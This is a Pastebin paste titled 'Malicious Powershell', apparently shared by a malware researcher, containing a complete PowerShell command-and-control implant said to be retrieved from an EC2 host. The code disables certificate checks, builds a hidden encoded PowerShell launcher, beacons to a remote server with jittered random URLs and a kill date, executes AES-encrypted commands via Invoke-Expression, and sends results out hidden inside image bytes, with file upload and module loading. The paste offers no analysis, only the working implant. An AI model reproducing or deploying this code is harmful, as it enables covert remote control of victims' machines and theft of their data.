dissectmalware

Malicious Powershell

Jul 27th, 2018
1,220
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #malicious powershell from https://ec2-13-127-208-134.ap-south-1.compute.amazonaws.com:443/images/static/content/
  2.  
  3. $key="GBkYVDloN+rQwqsx01h2ESyN+zSGcmYhd4tOzVAsplU="
  4. $sleeptime = 30
  5.  
  6. $payloadclear = @"
  7. [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {`$true}
  8. `$s="$s"
  9. `$sc="$sc"
  10. function DEC {${function:DEC}}
  11. function ENC {${function:ENC}}
  12. function CAM {${function:CAM}}
  13. function Get-Webclient {${function:Get-Webclient}}
  14. function Primer {${function:primer}}
  15. `$primer = primer
  16. if (`$primer) {`$primer| iex} else {
  17. start-sleep 1800
  18. primer | iex }
  19. "@
  20.  
  21. $ScriptBytes = ([Text.Encoding]::ASCII).GetBytes($payloadclear)
  22. $CompressedStream = New-Object IO.MemoryStream
  23. $DeflateStream = New-Object IO.Compression.DeflateStream ($CompressedStream, [IO.Compression.CompressionMode]::Compress)
  24. $DeflateStream.Write($ScriptBytes, 0, $ScriptBytes.Length)
  25. $DeflateStream.Dispose()
  26. $CompressedScriptBytes = $CompressedStream.ToArray()
  27. $CompressedStream.Dispose()
  28. $EncodedCompressedScript = [Convert]::ToBase64String($CompressedScriptBytes)
  29. $NewScript = "sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String(`"$EncodedCompressedScript`"),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"
  30. $UnicodeEncoder = New-Object System.Text.UnicodeEncoding
  31. $EncodedPayloadScript = [Convert]::ToBase64String($UnicodeEncoder.GetBytes($NewScript))
  32. $payloadraw = "powershell -exec bypass -Noninteractive -windowstyle hidden -e $($EncodedPayloadScript)"
  33. $payload = $payloadraw -replace "`n", ""
  34.  
  35. function GetImgData($cmdoutput) {
  36.     $icoimage = @("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")
  37.    
  38.     try {$image = $icoimage|get-random}catch{}
  39.  
  40.     function randomgen
  41.     {
  42.         param (
  43.             [int]$Length
  44.         )
  45.         $set = "...................@..........................Tyscf".ToCharArray()
  46.         $result = ""
  47.         for ($x = 0; $x -lt $Length; $x++)
  48.         {$result += $set | Get-Random}
  49.         return $result
  50.     }
  51.     $imageBytes = [Convert]::FromBase64String($image)
  52.     $maxbyteslen = 1500
  53.     $maxdatalen = 1500 + ($cmdoutput.Length)
  54.     $imagebyteslen = $imageBytes.Length
  55.     $paddingbyteslen = $maxbyteslen - $imagebyteslen
  56.     $BytePadding = [System.Text.Encoding]::UTF8.GetBytes((randomgen $paddingbyteslen))
  57.     $ImageBytesFull = New-Object byte[] $maxdatalen    
  58.     [System.Array]::Copy($imageBytes, 0, $ImageBytesFull, 0, $imageBytes.Length)
  59.     [System.Array]::Copy($BytePadding, 0, $ImageBytesFull,$imageBytes.Length, $BytePadding.Length)
  60.     [System.Array]::Copy($cmdoutput, 0, $ImageBytesFull,$imageBytes.Length+$BytePadding.Length, $cmdoutput.Length )
  61.     $ImageBytesFull
  62. }
  63. function Create-AesManagedObject($key, $IV) {
  64.     $aesManaged = New-Object "System.Security.Cryptography.RijndaelManaged"
  65.     $aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
  66.     $aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
  67.     $aesManaged.BlockSize = 128
  68.     $aesManaged.KeySize = 256
  69.     if ($IV) {
  70.     if ($IV.getType().Name -eq "String") {
  71.     $aesManaged.IV = [System.Convert]::FromBase64String($IV)
  72.     }
  73.     else {
  74.     $aesManaged.IV = $IV
  75.     }
  76.     }
  77.     if ($key) {
  78.     if ($key.getType().Name -eq "String") {
  79.     $aesManaged.Key = [System.Convert]::FromBase64String($key)
  80.     }
  81.     else {
  82.     $aesManaged.Key = $key
  83.     }
  84.     }
  85.     $aesManaged
  86. }
  87.  
  88. function Encrypt-String($key, $unencryptedString) {
  89.     $bytes = [System.Text.Encoding]::UTF8.GetBytes($unencryptedString)
  90.     $aesManaged = Create-AesManagedObject $key
  91.     $encryptor = $aesManaged.CreateEncryptor()
  92.     $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length);
  93.     [byte[]] $fullData = $aesManaged.IV + $encryptedData
  94.     #$aesManaged.Dispose()
  95.     [System.Convert]::ToBase64String($fullData)
  96. }
  97. function Encrypt-Bytes($key, $bytes) {
  98.     [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
  99.     $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
  100.     $gzipStream.Write( $bytes, 0, $bytes.Length )
  101.     $gzipStream.Close()
  102.     $bytes = $output.ToArray()
  103.     $output.Close()
  104.     $aesManaged = Create-AesManagedObject $key
  105.     $encryptor = $aesManaged.CreateEncryptor()
  106.     $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
  107.     [byte[]] $fullData = $aesManaged.IV + $encryptedData
  108.     $fullData
  109. }
  110. function Decrypt-String($key, $encryptedStringWithIV) {
  111.     $bytes = [System.Convert]::FromBase64String($encryptedStringWithIV)
  112.     $IV = $bytes[0..15]
  113.     $aesManaged = Create-AesManagedObject $key $IV
  114.     $decryptor = $aesManaged.CreateDecryptor();
  115.     $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16);
  116.     #$aesManaged.Dispose()
  117.     [System.Text.Encoding]::UTF8.GetString($unencryptedData).Trim([char]0)
  118. }
  119. function Encrypt-String2($key, $unencryptedString) {
  120.     $unencryptedBytes = [system.Text.Encoding]::UTF8.GetBytes($unencryptedString)
  121.     $CompressedStream = New-Object IO.MemoryStream
  122.     $DeflateStream = New-Object System.IO.Compression.GzipStream $CompressedStream, ([IO.Compression.CompressionMode]::Compress)
  123.     $DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length)
  124.     $DeflateStream.Dispose()
  125.     $bytes = $CompressedStream.ToArray()
  126.     $CompressedStream.Dispose()
  127.     $aesManaged = Create-AesManagedObject $key
  128.     $encryptor = $aesManaged.CreateEncryptor()
  129.     $encryptedData = $encryptor.TransformFinalBlock($bytes, 0, $bytes.Length)
  130.     [byte[]] $fullData = $aesManaged.IV + $encryptedData
  131.     $fullData
  132. }
  133. function Decrypt-String2($key, $encryptedStringWithIV) {
  134.     $bytes = $encryptedStringWithIV
  135.     $IV = $bytes[0..15]
  136.     $aesManaged = Create-AesManagedObject $key $IV
  137.     $decryptor = $aesManaged.CreateDecryptor()
  138.     $unencryptedData = $decryptor.TransformFinalBlock($bytes, 16, $bytes.Length - 16)
  139.     $output = (New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$unencryptedData)), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()
  140.     $output
  141.     #[System.Text.Encoding]::UTF8.GetString($output).Trim([char]0)
  142. }
  143. [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
  144.  
  145.  
  146. $URI= "dpvz36qvpvq530o"
  147. $Server = "$s/dpvz36qvpvq530o"
  148. $ServerClean = "$sc"
  149.  
  150.  
  151. while($true)
  152. {
  153.     $date = (Get-Date -Format "dd/MM/yyyy")
  154.     $date = [datetime]::ParseExact($date,"dd/MM/yyyy",$null)
  155.     $killdate = [datetime]::ParseExact("09/08/2018","dd/MM/yyyy",$null)
  156.     if ($killdate -lt $date) {exit}
  157.     $sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9)
  158.     $newsleep = $sleeptimeran|get-random
  159.     if ($newsleep -lt 1) {$newsleep = 5}
  160.     start-sleep $newsleep
  161.     $URLS = "images/static/content/","news/","webapp/static/","images/prints/","wordpress/site/","steam/connect/","true/images/static/","holdings/office/images/","preferences/site/","okfn/website/blob/master/templates/","forums/review/","general/community/mega/","organisations/space/value/","trigger/may/","web/master/review/","premium/gov/pop/","usc/builder/power/master/","shopping/v/awe/pool/app/a/","pl/en/pages/","store/en/uk/pages/","plugins/domains/custom/uk/","gas/safe/register/","online/free/advice/","cookies/websites/content/","free/uk/shopping/unlimited/"
  162.     $RandomURI = Get-Random $URLS
  163.     $G=[guid]::NewGuid()
  164.     $Server = "$ServerClean/$RandomURI$G/?$URI"
  165.     try { $ReadCommand = (Get-Webclient).DownloadString("$Server") } catch {}
  166.    
  167.     while($ReadCommand) {
  168.         $RandomURI = Get-Random $URLS
  169.         $G=[guid]::NewGuid()
  170.         $Server = "$ServerClean/$RandomURI$G/?$URI"
  171.         try { $ReadCommandClear = Decrypt-String $key $ReadCommand } catch {}
  172.         $error.clear()
  173.         if (($ReadCommandClear) -and ($ReadCommandClear -ne "fvdsghfdsyyh")) {
  174.             if  ($ReadCommandClear.ToLower().StartsWith("multicmd")) {
  175.                     $splitcmd = $ReadCommandClear -replace "multicmd",""
  176.                     $split = $splitcmd -split "!d-3dion@LD!-d"
  177.                     foreach ($i in $split){
  178.                         $RandomURI = Get-Random $URLS
  179.                         $G=[guid]::NewGuid()
  180.                         $Server = "$ServerClean/$RandomURI$G/?$URI"
  181.                         $error.clear()
  182.                         if ($i.ToLower().StartsWith("upload-file")) {
  183.                             try {
  184.                                 $Output = Invoke-Expression $i | out-string
  185.                                 $Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
  186.                                 if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] }
  187.                                 $ModuleLoaded = Encrypt-String $key $result
  188.                                 $Output = Encrypt-String2 $key $Output
  189.                                 $UploadBytes = getimgdata $Output
  190.                                 (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null
  191.                             } catch {
  192.                                 $Output = "ErrorUpload: " + $error[0]
  193.                             }
  194.                         } elseif ($i.ToLower().StartsWith("download-file")) {
  195.                             try {
  196.                                 Invoke-Expression $i | Out-Null
  197.                             }
  198.                             catch {
  199.                                 $Output = "ErrorLoadMod: " + $error[0]
  200.                             }
  201.                         } elseif ($i.ToLower().StartsWith("loadmodule")) {
  202.                             try {
  203.                                 $modulename = $i -replace "LoadModule",""
  204.                                 $Output = Invoke-Expression $modulename | out-string  
  205.                                 $Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
  206.                                 $ModuleLoaded = Encrypt-String $key "ModuleLoaded"
  207.                                 $Output = Encrypt-String2 $key $Output
  208.                                 $UploadBytes = getimgdata $Output
  209.                                 (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null
  210.                             } catch {
  211.                                 $Output = "ErrorLoadMod: " + $error[0]
  212.                             }
  213.                         } else {
  214.                             try {
  215.                                 $Output = Invoke-Expression $i | out-string  
  216.                                 $Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
  217.                                 $StdError = ($error[0] | Out-String)
  218.                                 if ($StdError){
  219.                                 $Output = $Output + $StdError
  220.                                 $error.clear()
  221.                                 }
  222.                             } catch {
  223.                                 $Output = "ErrorCmd: " + $error[0]
  224.                             }
  225.                             try {
  226.                             $Output = Encrypt-String2 $key $Output
  227.                             $Response = Encrypt-String $key $i
  228.                             $UploadBytes = getimgdata $Output
  229.                             (Get-Webclient -Cookie $Response).UploadData("$Server", $UploadBytes)|out-null
  230.                             } catch{}
  231.                         }
  232.                     }
  233.             }
  234.             elseif ($ReadCommandClear.ToLower().StartsWith("upload-file")) {
  235.                 try {
  236.                 $Output = Invoke-Expression $ReadCommandClear | out-string
  237.                 $Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
  238.                 if ($ReadCommandClear -match ("(.+)Base64")) { $result = $Matches[0] }
  239.                 $ModuleLoaded = Encrypt-String $key $result
  240.                 $Output = Encrypt-String2 $key $Output
  241.                 $UploadBytes = getimgdata $Output
  242.                 (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null
  243.                 } catch {
  244.                     $Output = "ErrorUpload: " + $error[0]
  245.                 }
  246.  
  247.             } elseif ($ReadCommandClear.ToLower().StartsWith("download-file")) {
  248.                 try {
  249.                     Invoke-Expression $ReadCommandClear | Out-Null
  250.                 }
  251.                 catch {
  252.                     $Output = "ErrorLoadMod: " + $error[0]
  253.                 }
  254.             } elseif ($ReadCommandClear.ToLower().StartsWith("loadmodule")) {
  255.                 try {
  256.                 $modulename = $ReadCommandClear -replace "LoadModule",""
  257.                 $Output = Invoke-Expression $modulename | out-string  
  258.                 $Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
  259.                 $ModuleLoaded = Encrypt-String $key "ModuleLoaded"
  260.                 $Output = Encrypt-String2 $key $Output
  261.                 $UploadBytes = getimgdata $Output
  262.                 (Get-Webclient -Cookie $ModuleLoaded).UploadData("$Server", $UploadBytes)|out-null
  263.                 } catch {
  264.                     $Output = "ErrorLoadMod: " + $error[0]
  265.                 }
  266.  
  267.             } else {
  268.                 try {
  269.                     $Output = Invoke-Expression $ReadCommandClear | out-string  
  270.                     $Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
  271.                     $StdError = ($error[0] | Out-String)
  272.                     if ($StdError){
  273.                     $Output = $Output + $StdError
  274.                     $error.clear()
  275.                     }
  276.                 } catch {
  277.                     $Output = "ErrorCmd: " + $error[0]
  278.                 }
  279.             try {
  280.             $Output = Encrypt-String2 $key $Output
  281.             $UploadBytes = getimgdata $Output
  282.             (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
  283.             } catch {}
  284.             }
  285.             $ReadCommandClear = $null
  286.         }
  287.     break
  288.     }
  289. }
Add Comment
Please, Sign In to add comment